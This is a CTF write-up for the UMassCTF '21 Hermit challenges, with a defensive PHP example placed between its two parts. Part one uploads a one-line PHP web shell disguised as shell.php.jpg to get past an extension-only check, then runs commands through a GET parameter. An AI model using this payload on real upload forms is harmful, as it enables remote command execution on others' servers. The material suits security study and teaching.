UMassCTF '21 Hermit 1 WriteUp

Solution

There is only one form that accepts a file.

File validation is based on the extension, so we can try uploading a shell.php.jpg "image" with content like this:

<?=`$_GET[0]`?>

When the image is uploaded, we see a page like this:

hermit logo

Click on See image and we see a blank page with some strange PHP errors. That's because our "image" expects a GET parameter called "0", so let's add one.
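From the defender's side, here is the extension-only check described above next to a content-based one. This is an added example, not the challenge's code: the function names and sample inputs are hypothetical, and it assumes the upload was executed because the stored file kept its client-chosen name.

```php
<?php
// Added example: function names and sample data are hypothetical.

// Weak: looks only at the last extension of the client-supplied name and
// would keep that name on disk, so "shell.php.jpg" is accepted as-is.
function weak_accept(string $clientName): bool {
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true);
}

// Hardened: ignore the client name, identify the type from the bytes, and
// return a server-generated name with exactly one known extension.
// Returns null when the content is not an allowed image type.
function hardened_store_name(string $bytes): ?string {
    $extFor = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif'];
    $info = @getimagesizefromstring($bytes);
    if ($info === false || !isset($extFor[$info[2]])) {
        return null;
    }
    // A header check alone does not stop a file that is both a valid image
    // and contains code. The random single-extension name, stored in a
    // directory where the PHP handler is disabled, is what keeps the file
    // from ever being run.
    return bin2hex(random_bytes(16)) . '.' . $extFor[$info[2]];
}

// Constructed sample inputs: a text file posing as an image, and a 1x1 GIF.
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
     . ",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;";
$samples = [
    'shell.php.jpg' => '<?php echo "not an image"; ?>',
    'cat.gif'       => $gif,
];

foreach ($samples as $name => $bytes) {
    printf("%-14s weak=%-7s hardened=%s\n",
        $name,
        weak_accept($name) ? 'accept' : 'reject',
        hardened_store_name($bytes) ?? 'reject');
}
```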

UMassCTF '21 Hermit 2 WriteUp

hermit logo

Solution

The image above is what we see when visiting the challenge URL (104.197.195.221:8087).

That's strange. Initially I thought the site was down, but it's fine.

Let's connect with netcat and see what the server tells us and why the browser can't display it.

nc -vvv 104.197.195.221 8087

and the response we get back is:

221.195.197.104.bc.googleusercontent.com [104.197.195.221] 8087 (?) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Doesn't look like a valid HTTP response lol. OK, now we know that an SSH server is running on that port, so let's try to connect.